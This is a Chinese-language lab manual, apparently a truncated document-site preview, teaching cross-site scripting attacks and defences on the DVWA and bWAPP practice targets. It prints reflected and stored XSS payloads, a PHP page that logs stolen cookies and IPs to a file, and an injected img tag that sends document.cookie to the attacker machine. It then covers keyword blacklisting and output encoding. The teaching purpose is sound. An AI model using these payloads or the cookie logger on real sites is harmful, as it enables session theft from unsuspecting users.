实训项目2:XSS跨站脚本点击劫持分析及防护_第1页
实训项目2:XSS跨站脚本点击劫持分析及防护_第2页
实训项目2:XSS跨站脚本点击劫持分析及防护_第3页
实训项目2:XSS跨站脚本点击劫持分析及防护_第4页
实训项目2:XSS跨站脚本点击劫持分析及防护_第5页
已阅读5页,还剩15页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

寻真求是格物致知信息安全发展态势与知识拓展实训项目指导手册V1.0目录TOC\o"1-2"\h\u30212XSS跨站脚本点击劫持分析及防护 220884概述 232577实验环境 28207前提条件 216212实验流程 27914实验目标 216549任务1反射型XSS漏洞利用 328655任务2存储型XSS漏洞利用 625298任务3XSS漏洞防护 13

XSS跨站脚本点击劫持分析及防护概述跨站脚本攻击XSS(CrossSiteScripting)是恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击,可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取,甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等。XSS跨站脚本攻击分为三类:反射型XSS(reflected)、存储型XSS(stored)、DOMBasedXSS。本实验使用的靶场环境为:DVWA、bWAPP。实验环境攻击机:WindowsServer2016(01-Windows攻击机),IP:30靶机:WindowsServer2016(03-Windows靶机),IP:56前提条件本实验要求:熟悉Windows基本操作熟悉基本的PHP函数和HTML标签实验流程实验目标完成本实验后,您将能够:掌握XSS漏洞基本利用方法掌握利用XSS获取用户cookie的方法掌握XSS漏洞的代码级防护方法任务1反射型XSS漏洞利用【任务目标】构造XSS代码,触发反射型XSS攻击,并通过反射型XSS漏洞,获取用户cookie信息。注:本实验靶场为:DVWA。【任务步骤】靶机开启网站环境在靶机上,运行PhpStudy网站环境。攻击机访问靶机DVWA站点在攻击机打开浏览器访问http://<靶机IP>/dvwa/login.php,账号:admin,密码:password设置安全等级在DVWA首页,单击左侧菜单栏“DVWASecurity”,将安全等级设置为:low。访问反射型XSS漏洞页面在DVWA首页,单击左侧菜单栏“XSS(Reflected)”,进入反射型XSS漏洞页面。执行攻击测试构造XSS代码:<script>alert(/xss/);</script>//该代码含义为:执行弹窗将代码填写到input输入框中,并点击“Submit”提交。页面成功弹窗,说明攻击代码已被执行。获取用户cookie 构造XSS代码语句:<script>alert(document.cookie);</script>将代码填写到input输入框中,并点击“Submit”提交。页面成功弹窗,并将当前用户cookie信息显示在弹窗中,说明成功获取到用户cookie信息。任务2存储型XSS漏洞利用【任务目标】构造XSS代码,触发存储型XSS攻击,并通过存储型XSS漏洞,获取用户cookie信息。注:本实验靶场为:bWAPP。【任务步骤】访问bWAPP页面在攻击机打开浏览器访问http://<靶机IP>/bwapp/login.php,账号:bee,密码:bug,安全等级设置为:low。访问存储型XSS漏洞页面在bWAPP首页,单击右侧下拉框,选择“Cross-SiteScripting-Stored(Blog)”并单击“Hack”按钮,进入存储型XSS漏洞页面。执行攻击测试构造XSS代码:<script>alert(/xss/);</script>将代码填写到输入框中并点击“Submit”进行提交。提交成功,并且嵌入的代码被执行。此时,代码已经成功被写入到服务器中。因为代码在服务器中永久保存,所以重新访问该漏洞页面,仍然会触发XSS代码。获取其他用户cookie(1)编写获取cookie值的页面编写一个可以获取用户cookie数值的页面,并存放到服务器中,具体代码如下:<?php$cook=$_GET['cookie']; //以GET方式获取cookie$ip=$_SERVER['REMOTE_ADDR'];$time=$_SERVER['REQUEST_TIME'];$cookie=strchr($cook,'P'); //截取字符串$fp=fopen('cookie.txt','a'); //将数据写入txt文本fwrite($fp,"IP:".$ip."\r\ncookie:".$cookie."\r\n");fclose($fp);?>将写好的代码文件存放到攻击机的网站路径中,并创建一个对应名称的txt文档,用来存放其他用户的cookie信息。在攻击机中,运行网站环境。打开浏览器,本地访问获取cookie的页面。(2)构造XSS语句构造如下XSS语句,当用户访问存在此代码的存储页面,即可获取该用户cookie信息:<script>document.write('<imgsrc="30/xss/cookie.php?cookie='+document.cookie+'">')</script>在XSS漏洞页面填写该代码,并提交。代码提交成功,接下来查看cookie.txt文件。可以看到,当前用户cookie信息已经被写入到txt文件中。因为代码在服务器中永久保存,所以其他用户访问该页面,同样会获取到对应用户的cookie信息。任务3XSS漏洞防护【任务目标】通过在页面中加入防护代码,实现XSS漏洞的代码级防护效果。本节实验环境为:DVWA,安全等级low,防护页面为:XSS(Reflected)。【任务步骤】黑名单过滤在C:\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\xss_r\source下编辑low.php漏洞页面,将<script>等关键词添加到黑名单,代码修改成如下图所示:测试黑名单效果。可以看到,包含有<script>的部分被替换为空,导致无法触发攻击弹窗效果。函数过滤编辑XSS漏洞页面,在用户提交的内容处,添加htmlspaci

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论